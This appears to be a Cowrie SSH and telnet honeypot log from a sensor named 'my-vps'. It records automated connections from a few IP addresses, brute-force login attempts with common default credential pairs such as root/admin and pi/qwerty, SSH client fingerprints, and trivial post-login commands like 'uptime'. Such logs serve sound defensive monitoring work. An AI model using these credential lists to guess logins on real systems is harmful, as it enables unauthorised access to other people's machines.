{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41582,"dst_ip":"1.2.3.4","dst_port":23,"session":"056ae9e55b68","protocol":"telnet","message":"New connection: 212.227.235.229:41582 (1.2.3.4:23) [session: 056ae9e55b68]","sensor":"my-vps","timestamp":"2025-08-28T12:01:55.397406Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:01:55.511999Z","src_ip":"212.227.125.160","session":"503d6a8daa90"}
{"eventid":"cowrie.session.closed","duration":180.55173683166504,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:01:55.515754Z","src_ip":"212.227.125.160","session":"503d6a8daa90"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T12:01:55.836215Z","src_ip":"212.227.235.229","session":"73dec60c7c3b"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T12:01:55.836958Z","src_ip":"212.227.235.229","session":"73dec60c7c3b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:01:56.229679Z","src_ip":"212.227.235.229","session":"73dec60c7c3b"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:01:56.299413Z","src_ip":"212.227.235.229","session":"73dec60c7c3b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:01:56.686212Z","src_ip":"79.124.8.120","session":"700736694a37"}
{"eventid":"cowrie.session.closed","duration":180.06626224517822,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:01:56.690746Z","src_ip":"79.124.8.120","session":"700736694a37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41639,"dst_ip":"1.2.3.4","dst_port":23,"session":"83be139e115b","protocol":"telnet","message":"New connection: 212.227.235.229:41639 (1.2.3.4:23) [session: 83be139e115b]","sensor":"my-vps","timestamp":"2025-08-28T12:01:57.464389Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44968,"dst_ip":"1.2.3.4","dst_port":22,"session":"187768182ca2","protocol":"ssh","message":"New connection: 212.227.125.160:44968 (1.2.3.4:22) [session: 187768182ca2]","sensor":"my-vps","timestamp":"2025-08-28T12:02:16.961120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:02:16.990847Z","src_ip":"212.227.125.160","session":"187768182ca2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:02:17.125486Z","src_ip":"212.227.125.160","session":"187768182ca2"}
{"eventid":"cowrie.login.failed","username":"pi","password":"qwerty","message":"login attempt [pi/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T12:02:17.784191Z","src_ip":"212.227.125.160","session":"187768182ca2"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:02:18.952993Z","src_ip":"212.227.125.160","session":"187768182ca2"}
{"eventid":"cowrie.session.closed","duration":31.37135148048401,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:02:25.798174Z","src_ip":"212.227.235.229","session":"6aaf4f716a17"}
{"eventid":"cowrie.session.closed","duration":31.491572380065918,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:02:26.888910Z","src_ip":"212.227.235.229","session":"056ae9e55b68"}
{"eventid":"cowrie.session.closed","duration":31.412317991256714,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:02:28.876633Z","src_ip":"212.227.235.229","session":"83be139e115b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41468,"dst_ip":"1.2.3.4","dst_port":23,"session":"9c8b1149368d","protocol":"telnet","message":"New connection: 212.227.235.229:41468 (1.2.3.4:23) [session: 9c8b1149368d]","sensor":"my-vps","timestamp":"2025-08-28T12:02:31.839617Z"}
{"eventid":"cowrie.session.closed","duration":31.46748423576355,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:03:03.307038Z","src_ip":"212.227.235.229","session":"9c8b1149368d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52608,"dst_ip":"1.2.3.4","dst_port":22,"session":"20798f43119b","protocol":"ssh","message":"New connection: 212.227.125.160:52608 (1.2.3.4:22) [session: 20798f43119b]","sensor":"my-vps","timestamp":"2025-08-28T12:03:06.611650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:03:06.612467Z","src_ip":"212.227.125.160","session":"20798f43119b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:03:06.783247Z","src_ip":"212.227.125.160","session":"20798f43119b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123123","message":"login attempt [pi/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:03:07.298691Z","src_ip":"212.227.125.160","session":"20798f43119b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:03:08.573307Z","src_ip":"212.227.125.160","session":"20798f43119b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34432,"dst_ip":"1.2.3.4","dst_port":23,"session":"a7a0c5eb8b63","protocol":"telnet","message":"New connection: 212.227.235.229:34432 (1.2.3.4:23) [session: a7a0c5eb8b63]","sensor":"my-vps","timestamp":"2025-08-28T12:03:18.923589Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38926,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe38d0d8bcc3","protocol":"ssh","message":"New connection: 212.227.125.160:38926 (1.2.3.4:22) [session: fe38d0d8bcc3]","sensor":"my-vps","timestamp":"2025-08-28T12:03:52.362570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:03:52.363546Z","src_ip":"212.227.125.160","session":"fe38d0d8bcc3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:03:52.533502Z","src_ip":"212.227.125.160","session":"fe38d0d8bcc3"}
{"eventid":"cowrie.login.failed","username":"pi","password":"111111","message":"login attempt [pi/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T12:03:53.379606Z","src_ip":"212.227.125.160","session":"fe38d0d8bcc3"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:03:54.555400Z","src_ip":"212.227.125.160","session":"fe38d0d8bcc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34610,"dst_ip":"1.2.3.4","dst_port":23,"session":"61c7b33d70ea","protocol":"telnet","message":"New connection: 212.227.125.160:34610 (1.2.3.4:23) [session: 61c7b33d70ea]","sensor":"my-vps","timestamp":"2025-08-28T12:03:55.688286Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:03:55.771007Z","src_ip":"212.227.125.160","session":"61c7b33d70ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T12:03:55.792065Z","src_ip":"212.227.125.160","session":"61c7b33d70ea"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T12:03:55.793219Z","src_ip":"212.227.125.160","session":"61c7b33d70ea"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T12:03:55.793965Z","src_ip":"212.227.125.160","session":"61c7b33d70ea"}
{"eventid":"cowrie.login.success","username":"root","password":"zaq1op][","message":"login attempt [root/zaq1op][] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:04:19.726299Z","src_ip":"212.227.235.229","session":"a7a0c5eb8b63"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T12:04:19.742278Z","src_ip":"212.227.235.229","session":"a7a0c5eb8b63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57932,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4c6ef55c6d7","protocol":"ssh","message":"New connection: 212.227.125.160:57932 (1.2.3.4:22) [session: c4c6ef55c6d7]","sensor":"my-vps","timestamp":"2025-08-28T12:04:35.613271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:04:35.620069Z","src_ip":"212.227.125.160","session":"c4c6ef55c6d7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:04:35.786152Z","src_ip":"212.227.125.160","session":"c4c6ef55c6d7"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234567","message":"login attempt [pi/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T12:04:36.761322Z","src_ip":"212.227.125.160","session":"c4c6ef55c6d7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:04:37.928640Z","src_ip":"212.227.125.160","session":"c4c6ef55c6d7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65278,"dst_ip":"1.2.3.4","dst_port":22,"session":"96dbee602941","protocol":"ssh","message":"New connection: 217.72.205.35:65278 (1.2.3.4:22) [session: 96dbee602941]","sensor":"my-vps","timestamp":"2025-08-28T12:05:05.865968Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:05:05.867194Z","src_ip":"217.72.205.35","session":"96dbee602941"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54322,"dst_ip":"1.2.3.4","dst_port":22,"session":"b19a1550c5ee","protocol":"ssh","message":"New connection: 212.227.125.160:54322 (1.2.3.4:22) [session: b19a1550c5ee]","sensor":"my-vps","timestamp":"2025-08-28T12:05:15.220831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:05:15.321436Z","src_ip":"212.227.125.160","session":"b19a1550c5ee"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:05:15.541165Z","src_ip":"212.227.125.160","session":"b19a1550c5ee"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123456","message":"login attempt [administrator/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T12:05:16.361701Z","src_ip":"212.227.125.160","session":"b19a1550c5ee"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:05:17.601135Z","src_ip":"212.227.125.160","session":"b19a1550c5ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33212,"dst_ip":"1.2.3.4","dst_port":23,"session":"a6cb7561f592","protocol":"telnet","message":"New connection: 212.227.235.229:33212 (1.2.3.4:23) [session: a6cb7561f592]","sensor":"my-vps","timestamp":"2025-08-28T12:05:40.115687Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57262,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf7f8b2d520e","protocol":"ssh","message":"New connection: 212.227.125.160:57262 (1.2.3.4:22) [session: bf7f8b2d520e]","sensor":"my-vps","timestamp":"2025-08-28T12:05:54.733423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:05:54.734310Z","src_ip":"212.227.125.160","session":"bf7f8b2d520e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:05:54.897826Z","src_ip":"212.227.125.160","session":"bf7f8b2d520e"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"password","message":"login attempt [administrator/password] failed","sensor":"my-vps","timestamp":"2025-08-28T12:05:55.387460Z","src_ip":"212.227.125.160","session":"bf7f8b2d520e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:05:56.551636Z","src_ip":"212.227.125.160","session":"bf7f8b2d520e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":64029,"dst_ip":"1.2.3.4","dst_port":22,"session":"d730a635dc10","protocol":"ssh","message":"New connection: 212.227.125.160:64029 (1.2.3.4:22) [session: d730a635dc10]","sensor":"my-vps","timestamp":"2025-08-28T12:05:58.311257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:05:58.313573Z","src_ip":"212.227.125.160","session":"d730a635dc10"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:05:58.372051Z","src_ip":"212.227.125.160","session":"d730a635dc10"}
{"eventid":"cowrie.login.failed","username":"admin","password":"999111","message":"login attempt [admin/999111] failed","sensor":"my-vps","timestamp":"2025-08-28T12:05:58.652831Z","src_ip":"212.227.125.160","session":"d730a635dc10"}
{"eventid":"cowrie.login.failed","username":"admin","password":"987654321q","message":"login attempt [admin/987654321q] failed","sensor":"my-vps","timestamp":"2025-08-28T12:05:59.714820Z","src_ip":"212.227.125.160","session":"d730a635dc10"}
{"eventid":"cowrie.login.failed","username":"admin","password":"979797","message":"login attempt [admin/979797] failed","sensor":"my-vps","timestamp":"2025-08-28T12:06:00.776397Z","src_ip":"212.227.125.160","session":"d730a635dc10"}
{"eventid":"cowrie.login.failed","username":"admin","password":"929292","message":"login attempt [admin/929292] failed","sensor":"my-vps","timestamp":"2025-08-28T12:06:01.839405Z","src_ip":"212.227.125.160","session":"d730a635dc10"}
{"eventid":"cowrie.login.failed","username":"admin","password":"885522","message":"login attempt [admin/885522] failed","sensor":"my-vps","timestamp":"2025-08-28T12:06:02.901884Z","src_ip":"212.227.125.160","session":"d730a635dc10"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:06:03.964329Z","src_ip":"212.227.125.160","session":"d730a635dc10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":31372,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fadfc252c84","protocol":"ssh","message":"New connection: 212.227.125.160:31372 (1.2.3.4:22) [session: 1fadfc252c84]","sensor":"my-vps","timestamp":"2025-08-28T12:06:19.545567Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:06:19.546635Z","src_ip":"212.227.125.160","session":"1fadfc252c84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":31667,"dst_ip":"1.2.3.4","dst_port":22,"session":"e34a884c0d00","protocol":"ssh","message":"New connection: 212.227.125.160:31667 (1.2.3.4:22) [session: e34a884c0d00]","sensor":"my-vps","timestamp":"2025-08-28T12:06:19.660180Z"}
